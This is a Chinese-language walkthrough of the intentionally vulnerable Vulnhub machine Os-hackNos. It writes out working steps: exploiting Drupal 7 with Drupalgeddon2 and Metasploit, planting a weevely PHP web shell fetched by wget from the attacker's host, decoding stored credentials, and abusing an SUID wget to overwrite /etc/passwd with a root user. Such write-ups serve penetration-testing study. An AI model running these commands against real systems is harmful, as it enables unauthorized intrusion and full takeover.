Vulnhub系列:Os-hackNos
0x01环境搭建
靶机链接: https://www.vulnhub.com/entry/hacknos-os-hacknos,401/
发布日期: 2019.11.27
靶机描述:
描述
难度:容易中级
标记:2标记第一个用户和第二个根
学习:利用| Web应用程序 枚举 特权提升
网址:www.hackNos.com
邮件:contact@hackNos.com
实验主机:kali linux虚拟机(VM)
实验靶机:Os-hackNos-1靶机(Virtualbox)
实验网络:桥接模式
实验难度:简单
0x02信息收集
1.主机发现
netdiscover -i eth0
或者用nmap
nmap -sn 192.168.43.0/24
ping探测扫描主机, 不进行端口扫描 (测试过对方主机把icmp包都丢弃掉,依然能检测到对方开机状态)
2.端口扫描
nmap 192.168.43.226 -O -sS -sV -v
-O 判断是什么操作系统
-sS 半开放扫描(非3次握手的tcp扫描)
-sV 版本检测,比如扫出SSH端口,然后得出它的版本号
-v 输出详细信息
发现它开启了22:ssh和80:http服务
http://192.168.43.226:80
打开一看是一个apache的界面,应该存在别的页面,先扫一下目录
dirb http://192.168.43.226
发现了如下路径
0x03漏洞发现
查看drupal目录
0x04漏洞利用
知道drupal版本为7,到github上去找exp
然后下载
git clone https://github.com/dreadlocked/Drupalgeddon2.git
在运行脚本前,需要预装依赖包highline
gem install highline
Gem是一个管理Ruby库和程序的标准包
执行脚本
./drupalgeddon2.rb http://192.168.43.226/drupal/
成功获得一个shell
查看权限
查看/etc/passwd,发现james用户
0x05权限提升
weevely
使用weevely生成小马
weevely generate hello ./door.php
把小马传到靶机上
scp root@192.168.43.221:/home/daye666/tools/weevely_ma/door.php /var/www/html/drupal
scp传输失败,试试wget
wget是一个从网络上自动下载文件的自由工具,支持通过HTTP、HTTPS、FTP三个最常见的TCP/IP协议下载,并可以使用HTTP代理。
kali先开启web服务
python -m SimpleHTTPServer 8000
靶机wget下载door.php
wget http://192.168.43.221:8000/door.php
ps:
在linux系统上安装了Python后,Python自带了一个WEB服务器 SimpleHTTPServer
可以使用 python -m SimpleHTTPServer 快速搭建一个http服务,提供一个文件浏览的web服务。
SimpleHTTPServer使用方法
1)进入待分享的目录
2)执行命令python -m SimpleHTTPServer 端口号
注意:不填端口号则默认使用8000端口。
3)浏览器访问该主机的地址:http://IP:端口号/
上传成功
weevely连接马儿
weevely http://192.168.43.226/drupal/door.php hello
浏览用户目录
在james用户目录下发现一串MD5哈希,估计是密码
bae11ce4f67af91fa58576c1da2aad4b
解密失败
浏览网站目录
发现base64编码的一串密文
KysrKysgKysrKysgWy0+KysgKysrKysgKysrPF0gPisrKysgKysuLS0gLS0tLS0gLS0uPCsgKytbLT4gKysrPF0gPisrKy4KLS0tLS0gLS0tLjwgKysrWy0gPisrKzwgXT4rKysgKysuPCsgKysrKysgK1stPi0gLS0tLS0gLTxdPi0gLS0tLS0gLS0uPCsKKytbLT4gKysrPF0gPisrKysgKy48KysgKysrWy0gPisrKysgKzxdPi4gKysuKysgKysrKysgKy4tLS0gLS0tLjwgKysrWy0KPisrKzwgXT4rKysgKy48KysgKysrKysgWy0+LS0gLS0tLS0gPF0+LS4gPCsrK1sgLT4tLS0gPF0+LS0gLS4rLi0gLS0tLisKKysuPA==
解密后为:
+++++ +++++ [->++ +++++ +++<] >++++ ++.-- ----- --.<+ ++[-> +++<] >+++.
----- ---.< +++[- >+++< ]>+++ ++.<+ +++++ +[->- ----- -<]>- ----- --.<+
++[-> +++<] >++++ +.<++ +++[- >++++ +<]>. ++.++ +++++ +.--- ---.< +++[-
>+++< ]>+++ +.<++ +++++ [->-- ----- <]>-. <+++[ ->--- <]>-- -.+.- ---.+
++.<
去这个网站解密:http://tool.bugku.com/brainfuck/?wafcloud=1
再解密:
james:Hacker@4514
切换用户
没有tty终端和密码请求程序,不能切换用户
suid提权
先检查哪些命令具有suid权限(具有suid权限的命令可以以文件拥有者的权限执行)
audit_suidsgid -only-suid /
当然也可以直接在shell中运行以下命令寻找既为root用户,也拥有SUID权限的程序;
find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
我们发现wget命令可以可以使普通用户以root权限执行,即我们可以利用它修改passwd文件,加入特权用户
生成密码哈希
openssl passwd -1 -salt salt daye
$1$salt$DdAoiqtA/a/oeQbF.cvVY1
使用weevely自带的file_download命令下载passwd文件到本地
file_download /etc/passwd /home/daye666/tools/passwd
已经在本地生成了passwd文件
写入特权用户
echo 'daye:$1$salt$DdAoiqtA/a/oeQbF.cvVY1:0:0::/root/:/bin/bash' >> passwd
然后用kali继续开启一个快速的http
使用wget -O命令替代靶机原来的passwd文件(suid提权意义所在)
wget http://192.168.43.221:8000/passwd -O /etc/passwd
切换用户失败
此时需要一个标准shell,参考 https://serverfault.com/questions/544328/su-must-be-run-from-a-terminal
得知PHP shell无法执行交互行为,使用su命令会请求密码输入(askpass)
因此,我们需要获得一个标准shell,请教表哥,说直接用meterperter即可
use exploit/unix/webapp/drupal_drupalgeddon2
set rhosts 192.168.43.226
set targeturi /drupal
run
使用meterpreter的shell命令切换到标准终端,输入 python3 -c 'import pty; pty.spawn("/bin/bash")'即获取标准shell
此时,切换用户,已经是root
参考:https://blog.csdn.net/qlqlulu/article/details/109958922
